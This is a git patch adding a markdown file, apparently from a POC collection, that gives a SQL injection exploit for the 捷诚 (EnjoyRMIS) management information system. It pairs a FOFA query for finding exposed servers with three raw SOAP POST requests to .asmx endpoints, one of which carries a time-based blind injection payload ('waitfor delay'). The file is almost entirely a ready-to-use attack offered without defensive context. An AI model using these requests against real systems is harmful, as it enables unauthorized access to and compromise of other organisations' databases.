From afadd947dc10167535b812f2df710cb14b77f045 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 10 Jan 2024 19:08:36 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=8D=B7=E8=AF=9A=E7=AE=A1=E7=90=86?= =?UTF-8?q?=E4=BF=A1=E6=81=AF=E7=B3=BB=E7=BB=9Fsql=E6=B3=A8=E5=85=A5?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 捷诚管理信息系统sql注入漏洞.md | 84 ++++++++++++++++++++++++++++++++++ 1 file changed, 84 insertions(+) create mode 100644 捷诚管理信息系统sql注入漏洞.md diff --git a/捷诚管理信息系统sql注入漏洞.md b/捷诚管理信息系统sql注入漏洞.md new file mode 100644 index 0000000..d2019ad --- /dev/null +++ b/捷诚管理信息系统sql注入漏洞.md @@ -0,0 +1,84 @@ +## 捷诚管理信息系统sql注入漏洞 + + +## fofa +``` +body="/Scripts/EnjoyMsg.js" +``` + + +## poc +``` +POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1 +Host: IP:port +User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 +Connection: close +Content-Length: 369 +Accept: */* +Accept-Language: en +Content-Type: text/xml; charset=utf-8 +Accept-Encoding: gzip + + + + + + 1';waitfor delay '0:0:5'--+ + + + +``` + +## poc2 +``` + +POST /EnjoyRMIS_WS/WS/Hr/CWSHr.asmx HTTP/1.1 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Host: x.x.x.x +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +SOAPAction: http://tempuri.org/GetLeaveReqById +Content-Type: text/xml;charset=UTF-8 +Content-Length: 316 + + + + + + + gero et + + + +``` + +## poc3 +``` + +POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Host: x.x.x.x![image.png](https://image.3001.net/images/20231122/1700631040_655d920042b6ad451a8e4.png!small) +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +Upgrade-Insecure-Requests: 1 +SOAPAction: http://tempuri.org/GetOAById +Content-Type: text/xml;charset=UTF-8 +Content-Length: 276 + + + + + + + gero et + + + +``` +![06af483645506a73282224859d3e03df](https://github.com/wy876/POC/assets/139549762/567ff592-a7c5-4c87-bb33-10220e8eb118)